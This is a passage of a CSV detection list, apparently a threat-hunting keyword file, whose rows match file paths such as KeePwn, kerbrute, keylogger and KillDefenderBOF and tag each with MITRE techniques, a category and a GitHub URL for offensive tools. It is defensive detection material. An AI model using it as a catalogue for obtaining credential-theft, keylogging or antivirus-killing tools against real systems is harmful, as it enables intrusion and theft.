"*/keepass_trigger.py*",".{0,1000}\/keepass_trigger\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/keepwn.core.*",".{0,1000}\/keepwn\.core.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeePwn.git*",".{0,1000}\/KeePwn\.git.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeePwn.py*",".{0,1000}\/KeePwn\.py.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/keepwn.utils.*",".{0,1000}\/keepwn\.utils.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeePwn/keepwn/*",".{0,1000}\/KeePwn\/keepwn\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeePwn/tarball/*",".{0,1000}\/KeePwn\/tarball\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeePwn/zipball/*",".{0,1000}\/KeePwn\/zipball\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeePwn-0.3/*",".{0,1000}\/KeePwn\-0\.3\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeeThief.git*",".{0,1000}\/KeeThief\.git.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*/kekeo.exe*",".{0,1000}\/kekeo\.exe.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/kerberoast.*",".{0,1000}\/kerberoast\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/kerberoast.c*",".{0,1000}\/kerberoast\.c.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/kerberoast.c*",".{0,1000}\/kerberoast\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*/kerberoast.h*",".{0,1000}\/kerberoast\.h.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/kerberoast.py*",".{0,1000}\/kerberoast\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/kerberoast/*.*",".{0,1000}\/kerberoast\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/kerberoast_hashes_*.txt*",".{0,1000}\/kerberoast_hashes_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/kerberoastables.txt*",".{0,1000}\/kerberoastables\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/KerberOPSEC.git*",".{0,1000}\/KerberOPSEC\.git.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*/kerberos.py*",".{0,1000}\/kerberos\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/kerberos-ldap-password-hunter*",".{0,1000}\/kerberos\-ldap\-password\-hunter.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*/kerberosticket.py*",".{0,1000}\/kerberosticket\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*/Kerbeus-BOF.git*",".{0,1000}\/Kerbeus\-BOF\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*/Kerbeus-BOF/*",".{0,1000}\/Kerbeus\-BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*/kerbrute.git*",".{0,1000}\/kerbrute\.git.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*/kerbrute.go*",".{0,1000}\/kerbrute\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*/kerbrute.py*",".{0,1000}\/kerbrute\.py.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*/kerbrute/*",".{0,1000}\/kerbrute\/.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*/KernelMii.c*",".{0,1000}\/KernelMii\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*/KExecDD.git*",".{0,1000}\/KExecDD\.git.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","1","N/A","8","2","172","27","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z" "*/keylogger.cpp*",".{0,1000}\/keylogger\.cpp.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","10","10","139","39","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" "*/KeyLogger.cs*",".{0,1000}\/KeyLogger\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/Keylogger.dll*",".{0,1000}\/Keylogger\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/keylogger.exe*",".{0,1000}\/keylogger\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","10","10","139","39","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" "*/keylogger/*.*",".{0,1000}\/keylogger\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/keyscan.go*",".{0,1000}\/keyscan\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/KidLogger.app/*",".{0,1000}\/KidLogger\.app\/.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/kidlogger.desktop*",".{0,1000}\/kidlogger\.desktop.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/killav.*",".{0,1000}\/killav\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/killav.py*",".{0,1000}killav\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/killav.rb*",".{0,1000}\/killav\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/KillDefenderBOF*",".{0,1000}\/KillDefenderBOF.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","208","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*/killer.exe*",".{0,1000}\/killer\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","10","7","N/A","N/A","N/A","N/A" "*/Killer.git*",".{0,1000}\/Killer\.git.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","10","7","N/A","N/A","N/A","N/A" "*/kimi.py*",".{0,1000}\/kimi\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/Kirby.ps1*",".{0,1000}\/Kirby\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*/Kirby.ps1*",".{0,1000}\/Kirby\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*/kismet*",".{0,1000}\/kismet.{0,1000}","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","0","N/A","N/A","10","1445","287","2024-04-30T03:51:34Z","2016-09-20T13:26:00Z" "*/kismetwireless/*",".{0,1000}\/kismetwireless\/.{0,1000}","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","1","N/A","N/A","10","1445","287","2024-04-30T03:51:34Z","2016-09-20T13:26:00Z" "*/kitrap0d.*",".{0,1000}\/kitrap0d\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/kittens/haloKitten*",".{0,1000}\/kittens\/haloKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/kittens/recycleKitten*",".{0,1000}\/kittens\/recycleKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/KittyStager/*",".{0,1000}\/KittyStager\/.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/kiwi.rb*",".{0,1000}\/kiwi\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 